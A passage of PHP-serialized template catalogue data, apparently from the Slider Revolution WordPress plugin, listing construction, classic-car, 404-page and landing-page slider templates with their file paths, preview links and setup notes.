Company\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:329;a:25:{s:2:\"id\";s:3:\"345\";s:5:\"title\";s:17:\"Construction Home\";s:5:\"alias\";s:17:\"Construction-Home\";s:3:\"zip\";s:27:\"packs/Construction-Home.zip\";s:3:\"uid\";s:32:\"fcb277f0c07dad270d2a7cef4431bef8\";s:3:\"img\";s:28:\"Construction-Home/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:6:\"slider\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:330;a:25:{s:2:\"id\";s:3:\"346\";s:5:\"title\";s:21:\"Construction Projects\";s:5:\"alias\";s:21:\"Construction-Projects\";s:3:\"zip\";s:31:\"packs/Construction-Projects.zip\";s:3:\"uid\";s:32:\"0c847173c3739f79778dc2c0fc9704e4\";s:3:\"img\";s:32:\"Construction-Projects/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:331;a:25:{s:2:\"id\";s:3:\"347\";s:5:\"title\";s:20:\"Construction History\";s:5:\"alias\";s:20:\"Construction-History\";s:3:\"zip\";s:30:\"packs/Construction-History.zip\";s:3:\"uid\";s:32:\"758da120c4b6c5606692faf0aa43aac6\";s:3:\"img\";s:31:\"Construction-History/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:332;a:25:{s:2:\"id\";s:3:\"348\";s:5:\"title\";s:21:\"Construction Services\";s:5:\"alias\";s:21:\"Construction-Services\";s:3:\"zip\";s:31:\"packs/Construction-Services.zip\";s:3:\"uid\";s:32:\"5ad5b841c1d89e97ddbf972c8b11abd4\";s:3:\"img\";s:32:\"Construction-Services/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:333;a:25:{s:2:\"id\";s:3:\"349\";s:5:\"title\";s:21:\"Construction Contacts\";s:5:\"alias\";s:21:\"Construction-Contacts\";s:3:\"zip\";s:31:\"packs/Construction-Contacts.zip\";s:3:\"uid\";s:32:\"b8c3c34046bb91ebb243e4da64745d37\";s:3:\"img\";s:32:\"Construction-Contacts/slide1.jpg\";s:7:\"preview\";s:63:\"https://revolution.themepunch.com/construction-company-website/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:244:\"<span class=\"ttm_content\">The Construction Company is the perfect introduction to your Construction themed website. Showcase your current projects, services and contact information with sleek transitions!</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:420:\"<span class=\"ttm_content\">If you want to setup the full website example as seen in the preview, please follow the <a href=\"https://www.themepunch.com/faq/setup-content-blocks-template/\" target=\"_blank\">Content Blocks instructions here</a>.<br><br>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:20:\"Construction Company\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"26\";s:9:\"installed\";b:0;}i:334;a:22:{s:2:\"id\";s:3:\"350\";s:5:\"title\";s:22:\"Classic Cars Evolution\";s:5:\"alias\";s:22:\"Classic-Cars-Evolution\";s:3:\"zip\";s:26:\"Classic-Cars-Evolution.zip\";s:3:\"uid\";s:32:\"7061757f128fd624b0227715dab73b74\";s:3:\"img\";s:33:\"Classic-Cars-Evolution/slide1.jpg\";s:7:\"preview\";s:65:\"https://revolution.themepunch.com/classic-cars-before-after-hero/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:156:\"<span class=\"ttm_content\">The Classic Cars Evolution Slider is a great example of our popular before & after Add-On.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:4:\"hero\";}s:14:\"plugin_require\";s:175:\"[{\"path\":\"revslider-beforeafter-addon\\/revslider-beforeafter-addon.php\",\"name\":\"Before After AddOn\",\"url\":\"https:\\/\\/www.themepunch.com\\/slider-revolution\\/install-addons\\/\"}]\";s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:335;a:22:{s:2:\"id\";s:3:\"351\";s:5:\"title\";s:21:\"404 Error Space Theme\";s:5:\"alias\";s:21:\"404-Error-Space-Theme\";s:3:\"zip\";s:25:\"404-Error-Space-Theme.zip\";s:3:\"uid\";s:32:\"6412adc7ec025826328e40e552a14e1e\";s:3:\"img\";s:32:\"404-Error-Space-Theme/slide1.jpg\";s:7:\"preview\";s:49:\"https://revolution.themepunch.com/404-error-page/\";s:7:\"version\";s:5:\"1.0.2\";s:8:\"required\";s:5:\"6.0.0\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:158:\"<span class=\"ttm_content\">The Classic Cars Evolution Slider is the perfect way to make your error page more beautiful.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:171:\"<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:6:\"slider\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:13:\"package_order\";s:1:\"0\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:9:\"installed\";b:0;}i:336;a:25:{s:2:\"id\";s:3:\"352\";s:5:\"title\";s:12:\"Landing Page\";s:5:\"alias\";s:20:\"landing-page-website\";s:3:\"zip\";s:0:\"\";s:3:\"uid\";s:28:\"landing-page-website-package\";s:3:\"img\";s:23:\"packages/lp_package.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1024\";s:6:\"height\";s:3:\"768\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:1:{i:0;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"0\";s:14:\"package_parent\";s:4:\"true\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:337;a:25:{s:2:\"id\";s:3:\"353\";s:5:\"title\";s:17:\"Landing Page Hero\";s:5:\"alias\";s:17:\"landing-page-hero\";s:3:\"zip\";s:27:\"packs/landing-page-hero.zip\";s:3:\"uid\";s:32:\"d328635caa20da7ee8a3ab687f8656ff\";s:3:\"img\";s:28:\"landing-page-hero/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"1\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:338;a:25:{s:2:\"id\";s:3:\"354\";s:5:\"title\";s:21:\"Landing Page Features\";s:5:\"alias\";s:21:\"landing-page-features\";s:3:\"zip\";s:31:\"packs/landing-page-features.zip\";s:3:\"uid\";s:32:\"6552bc72abace10918a64866d9bb79c1\";s:3:\"img\";s:32:\"landing-page-features/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"3\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:339;a:25:{s:2:\"id\";s:3:\"355\";s:5:\"title\";s:20:\"Landing Page Callout\";s:5:\"alias\";s:20:\"landing-page-callout\";s:3:\"zip\";s:30:\"packs/landing-page-callout.zip\";s:3:\"uid\";s:32:\"c5b101ea5471e7409ae7effa8d45fbcf\";s:3:\"img\";s:31:\"landing-page-callout/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"4\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:340;a:25:{s:2:\"id\";s:3:\"356\";s:5:\"title\";s:20:\"Landing Page Content\";s:5:\"alias\";s:20:\"landing-page-content\";s:3:\"zip\";s:30:\"packs/landing-page-content.zip\";s:3:\"uid\";s:32:\"34da8057a6bb3677c9adf9f18ffc6cf0\";s:3:\"img\";s:31:\"landing-page-content/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.1\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"2\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:341;a:25:{s:2:\"id\";s:3:\"357\";s:5:\"title\";s:25:\"Landing Page Testimonials\";s:5:\"alias\";s:25:\"landing-page-testimonials\";s:3:\"zip\";s:35:\"packs/landing-page-testimonials.zip\";s:3:\"uid\";s:32:\"a83606e311cd5115422d86f04890cbf1\";s:3:\"img\";s:36:\"landing-page-testimonials/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"5\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:342;a:25:{s:2:\"id\";s:3:\"358\";s:5:\"title\";s:27:\"Landing Page Call to Action\";s:5:\"alias\";s:27:\"landing-page-call-to-action\";s:3:\"zip\";s:37:\"packs/landing-page-call-to-action.zip\";s:3:\"uid\";s:32:\"adfb456b27fa7eb6b1415d8f80836f05\";s:3:\"img\";s:38:\"landing-page-call-to-action/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"6\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:343;a:25:{s:2:\"id\";s:3:\"359\";s:5:\"title\";s:17:\"Landing Page Help\";s:5:\"alias\";s:17:\"landing-page-help\";s:3:\"zip\";s:27:\"packs/landing-page-help.zip\";s:3:\"uid\";s:32:\"ca502431f9b7f6249d99b02464de2dd7\";s:3:\"img\";s:28:\"landing-page-help/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"7\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:344;a:25:{s:2:\"id\";s:3:\"360\";s:5:\"title\";s:19:\"Landing Page Footer\";s:5:\"alias\";s:19:\"landing-page-footer\";s:3:\"zip\";s:29:\"packs/landing-page-footer.zip\";s:3:\"uid\";s:32:\"2a6afc371dbd60cb117f8a0f5d09eac9\";s:3:\"img\";s:30:\"landing-page-footer/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"8\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"0\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:345;a:25:{s:2:\"id\";s:3:\"361\";s:5:\"title\";s:24:\"Landing Page Price Modal\";s:5:\"alias\";s:24:\"landing-page-price-modal\";s:3:\"zip\";s:34:\"packs/landing-page-price-modal.zip\";s:3:\"uid\";s:32:\"a6c5c0430b46dd4e6e68416964a8c54d\";s:3:\"img\";s:35:\"landing-page-price-modal/slide1.jpg\";s:7:\"preview\";s:55:\"https://revolution.themepunch.com/landing-page-builder/\";s:7:\"version\";s:5:\"1.0.0\";s:8:\"required\";s:5:\"6.0.8\";s:5:\"width\";s:4:\"1240\";s:6:\"height\";s:3:\"868\";s:11:\"description\";s:193:\"<span class=\"ttm_content\">Landing Page is a one-page website template with standard modules to build an effective landing page for your business/product.</span>\r\n<span class=\"ttm_space\"></span>\";s:11:\"setup_notes\";s:624:\"<span class=\"ttm_content\">After installing this template package, please remove the \"price modal\" module shortcode from the automatically created page. Also, a small modification is needed in these templates: \"Landing Page Hero\", \"Landing page Call to Action\" and \"Landing Page Footer\". Click the buttons in these template and then go to \"layer -> actions\" and set the target of the \"Open Slider Modal\" action to the \"Landing Page Price Modal\".</span>\r\n<span class=\"ttm_content\">Checkout our <a href=\"https://revolution.themepunch.com/documentation\" target=\"_blank\">Documentation</a> for basic Slider Revolution help.</span>\";s:3:\"cat\";s:7:\"Premium\";s:6:\"filter\";a:2:{i:0;s:4:\"hero\";i:1;s:7:\"website\";}s:14:\"plugin_require\";N;s:4:\"date\";s:19:\"0000-00-00 00:00:00\";s:7:\"package\";s:12:\"Landing Page\";s:13:\"package_order\";s:1:\"9\";s:14:\"package_parent\";s:0:\"\";s:5:\"modal\";s:1:\"1\";s:9:\"additions\";s:0:\"\";s:6:\"active\";s:1:\"1\";s:10:\"package_id\";s:2:\"27\";s:9:\"installed\";b:0;}i:346;a:25:{s:2:\"id\";s:3:\"371\";s:5:\"title\";s:17:\"Corporate 